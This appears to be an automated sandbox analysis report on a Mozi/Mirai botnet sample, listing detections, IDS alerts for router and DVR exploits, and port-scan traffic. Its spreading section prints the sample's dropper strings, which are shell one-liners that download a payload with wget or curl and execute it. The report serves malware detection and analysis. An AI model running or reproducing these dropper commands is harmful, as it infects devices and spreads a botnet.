Linux Analysis Report
Mozi.m.3

Overview

General Information

Sample Name: Mozi.m.3
Analysis ID: 562113
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Found strings indicative of a multi-platform dropper
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample contains strings that are potentially command strings
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Mozi.m.3 Avira: detected
Multi AV Scanner detection for submitted file
Source: Mozi.m.3 Virustotal: Detection: 65% Perma Link
Source: Mozi.m.3 Metadefender: Detection: 68% Perma Link
Source: Mozi.m.3 ReversingLabs: Detection: 75%
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau

Spreading
barindex
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/Mozi.m.3 (PID: 5234) Opens: /proc/net/route Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5234) Opens: /proc/net/route Jump to behavior
Found strings indicative of a multi-platform dropper
Source: Mozi.m.3 String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m.3 String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m.3 String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.12.dr String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.12.dr String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.12.dr String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47852 -> 201.49.46.204:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47852 -> 201.49.46.204:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41138 -> 176.32.230.19:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41138 -> 176.32.230.19:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:37034 -> 173.249.33.238:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:37034 -> 173.249.33.238:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33768 -> 201.20.107.209:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33768 -> 201.20.107.209:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50306 -> 23.11.243.9:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50306 -> 23.11.243.9:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.11.243.9:80 -> 192.168.2.23:50306
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54856 -> 81.108.37.251:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.122.127:80 -> 192.168.2.23:55982
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48454 -> 186.219.131.213:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.57.42.173:80 -> 192.168.2.23:54054
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48454 -> 186.219.131.213:80
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58926 -> 34.120.140.43:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47780 -> 104.116.174.45:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47780 -> 104.116.174.45:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.174.45:80 -> 192.168.2.23:47780
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 152.89.62.52:30301 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.193.239:8000 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 174.84.184.69:11211 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 109.164.113.203:5060 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41594 -> 173.223.178.190:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41594 -> 173.223.178.190:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.178.190:80 -> 192.168.2.23:41594
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41494 -> 63.33.145.170:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41494 -> 63.33.145.170:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 61.3.148.76:18606 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.93.89:1900 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46626 -> 162.209.132.128:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46626 -> 162.209.132.128:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34362 -> 148.229.1.12:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60110 -> 205.198.160.107:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60110 -> 205.198.160.107:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49554 -> 45.131.208.158:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49554 -> 45.131.208.158:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45688 -> 104.25.119.143:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46790 -> 171.25.175.236:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45688 -> 104.25.119.143:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46790 -> 171.25.175.236:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33654 -> 13.35.5.125:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39960 -> 23.58.36.209:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33654 -> 13.35.5.125:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52420 -> 54.173.33.241:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52420 -> 54.173.33.241:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39960 -> 23.58.36.209:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.58.36.209:80 -> 192.168.2.23:39960
Source: Traffic Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:35686 -> 67.87.4.136:81
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:36530 -> 185.115.61.29:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:36530 -> 185.115.61.29:8080
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33922 -> 83.240.213.6:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33922 -> 83.240.213.6:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33508 -> 23.6.123.60:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33508 -> 23.6.123.60:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.123.60:80 -> 192.168.2.23:33508
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:36280 -> 1.9.218.126:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44592 -> 154.209.180.104:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44592 -> 154.209.180.104:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60432 -> 154.215.209.203:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60432 -> 154.215.209.203:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33924 -> 188.215.82.71:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33924 -> 188.215.82.71:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46150 -> 130.107.153.243:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46150 -> 130.107.153.243:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50894 -> 178.32.54.199:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50894 -> 178.32.54.199:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35956 -> 23.44.16.109:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35956 -> 23.44.16.109:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.16.109:80 -> 192.168.2.23:35956
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45318 -> 198.50.31.71:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45318 -> 198.50.31.71:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57410 -> 23.201.48.195:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:57410 -> 23.201.48.195:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.201.48.195:80 -> 192.168.2.23:57410
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38758 -> 114.142.213.80:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38758 -> 114.142.213.80:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49740 -> 3.66.12.202:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49740 -> 3.66.12.202:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46580 -> 34.102.251.67:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46580 -> 34.102.251.67:8080
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58084 -> 87.17.124.195:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58084 -> 87.17.124.195:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 60.254.146.28:80 -> 192.168.2.23:59316
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51146 -> 95.171.44.71:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:51146 -> 95.171.44.71:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60330 -> 37.28.170.140:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60330 -> 37.28.170.140:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55812 -> 93.41.229.147:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54054 -> 23.57.42.173:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55982 -> 23.1.122.127:80
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 49.30.95.191 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 46.208.194.138 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 186.13.189.220 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 115.128.48.99 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 87.59.59.83 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 40.217.232.105 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 1.102.177.191 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 145.78.150.14 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 182.70.170.130 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 194.204.98.109 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 147.242.54.19 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 92.66.154.32 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 165.213.73.162 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 60.91.131.86 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 97.132.168.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 81.78.52.168 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 152.225.18.120 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 183.56.193.84 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 170.248.33.117 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 119.44.231.19 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 34.235.160.60 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 112.176.104.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 27.49.23.52 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 105.242.110.44 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 93.51.81.184 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 119.236.192.141 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 166.236.5.250 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 120.234.0.119 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 145.20.161.88 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 45.60.67.75 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 182.6.67.113 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 120.184.29.196 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 83.120.45.138 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 71.10.2.3 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 186.74.80.35 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 6.42.96.227 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 131.239.170.174 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 130.30.19.29 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 124.242.109.222 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 60.39.118.49 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 154.227.186.158 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 41.1.30.61 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 122.36.114.106 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 150.179.62.203 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 33.162.5.64 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 79.115.136.43 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 221.126.105.14 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 188.90.174.120 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 219.17.67.235 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 34.69.23.176 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 8.96.114.127 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 118.24.78.63 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 105.188.53.103 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 88.103.118.246 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 8.33.31.17 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 189.232.159.133 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 83.41.162.42 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 79.161.24.176 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 143.54.177.24 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 4.178.77.136 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 154.2.250.169 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 197.43.185.122 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 168.21.138.88 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 156.225.166.184 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 1.224.209.95 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 30.101.205.242 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 119.163.0.210 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 83.199.233.176 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 159.42.57.237 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 60.138.201.97 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 120.185.75.38 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 211.183.25.135 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 133.193.211.115 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 210.162.131.189 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 33.38.63.31 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 179.28.189.224 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 198.195.107.231 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 103.133.112.54 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 29.146.1.94 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 216.93.120.15 ports 1,2,3,5,7,37215
